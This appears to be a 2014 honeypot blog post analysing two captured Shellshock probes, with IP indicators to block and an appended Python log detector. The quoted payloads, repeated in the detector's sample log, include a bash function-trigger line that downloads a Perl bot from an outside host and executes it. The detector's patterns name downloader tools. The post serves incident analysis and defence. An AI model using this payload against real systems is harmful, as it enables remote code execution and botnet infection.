ShellShock Part 2

I was able to track down yet another 2 alerts from my Honey Pot today.

# tail /var/log/nginx/access.log

29-09-2014 07:43:08,67.227.0.73,() { :;}; /bin/bash -c "wget -P /var/tmp 174.143.240.43/…/x ; perl /var/tmp/x",
29-09-2014 09:30:11,54.251.83.67,() { :;}; /bin/bash -c "echo testing9123123"; /bin/uname -a,

The second alert is interesting: the IP (54.251.83.67) belongs to Amazon Web Services in Singapore. This IP is possibly compromised (I leave confirming that to Amazon) or is being used deliberately for malicious activity. VirusTotal has no significant results for it yet, but one malicious activity has already been identified.


We have noticed that this particular IP is scanning organisations, companies and private/personal blogs alike, looking for vulnerable hosts. Be on alert for this IP (54.251.83.67) if it hits your network, and block it immediately.

Next, let's talk about the first one.

IP 174.143.240.43 belongs to Rackspace hosting. The payload uses a directory-traversal-style path to fetch a base64-encoded Perl file and execute it on the vulnerable machine. That Perl file is a Perl bot.

# curl -I http://174.143.240.43/…/x

HTTP/1.1 200 OK
Date: Mon, 29 Sep 2014 06:15:28 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Sat, 27 Sep 2014 21:46:13 GMT
ETag: "340b1a-1b4dc-50412f6609340"
Accept-Ranges: bytes
Content-Length: 111836
Content-Type: text/plain

# curl -I http://174.143.240.43/

HTTP/1.1 200 OK
Date: Mon, 29 Sep 2014 06:15:33 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Tue, 06 Jul 2010 13:09:57 GMT
ETag: "33991a-2d-48ab7c5155340"
Accept-Ranges: bytes
Content-Length: 45
Vary: Accept-Encoding
Content-Type: text/html

VirusTotal Results

New Indicators

  • 54.251.83.67
  • 174.143.240.43

Block these at the perimeter; most firewalls are already doing so. It will be more interesting to check whether any internal hosts are already communicating with these IPs.
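As an added example that is not part of the original post, here is a small Python detector for the honeypot log format shown above (date,ip,payload). It flags Shellshock-style payloads and pulls out the secondary hosts a payload would make the victim contact, which is the list to check internal egress logs against. The first two sample lines are the post's own alerts with straight quotes; the third is a constructed benign request, and the regexes and field names are my own assumptions about the log.

```python
import re

# Constructed sample in the honeypot's "date time,ip,payload," format.
# Lines 1-2 reproduce the post's alerts; line 3 is a constructed benign hit.
SAMPLE_LOG = (
    '29-09-2014 07:43:08,67.227.0.73,() { :;}; /bin/bash -c "wget -P /var/tmp '
    '174.143.240.43/…/x ; perl /var/tmp/x",\n'
    '29-09-2014 09:30:11,54.251.83.67,() { :;}; /bin/bash -c "echo testing9123123"; /bin/uname -a,\n'
    '29-09-2014 09:31:00,198.51.100.7,GET / HTTP/1.1 Mozilla/5.0,\n'
)

# Shellshock trigger: an exported function body "() { ... }" followed by ";"
# and trailing commands, which a vulnerable bash executes on import.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")
# Dotted-quad literals, used to harvest hosts named inside the payload.
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
DOWNLOADERS = ("wget", "curl", "fetch", "tftp")


def parse_line(line):
    """Split 'date time,ip,payload,' into three fields; payload may hold commas."""
    parts = line.rstrip("\n").rstrip(",").split(",", 2)
    if len(parts) != 3:
        return None
    ts, src, payload = parts
    return {"ts": ts, "src": src.strip(), "payload": payload}


def analyse(line):
    """Return an enriched record for a Shellshock hit, or None for anything else."""
    rec = parse_line(line)
    if rec is None or not SHELLSHOCK_RE.search(rec["payload"]):
        return None
    rec["downloads"] = any(tool in rec["payload"] for tool in DOWNLOADERS)
    # Any IP in the payload other than the scanner itself is a second-stage host.
    rec["secondary"] = sorted(set(IPV4_RE.findall(rec["payload"])) - {rec["src"]})
    return rec


def indicators(log_text):
    """Return (scanner IPs, second-stage hosts) for every Shellshock hit in the log."""
    sources, secondary = set(), set()
    for line in log_text.splitlines():
        hit = analyse(line)
        if hit:
            sources.add(hit["src"])
            secondary.update(hit["secondary"])
    return sorted(sources), sorted(secondary)


if __name__ == "__main__":
    print(indicators(SAMPLE_LOG))
```

Feed it the real access log instead of SAMPLE_LOG and the second list is what to grep for in proxy and firewall logs.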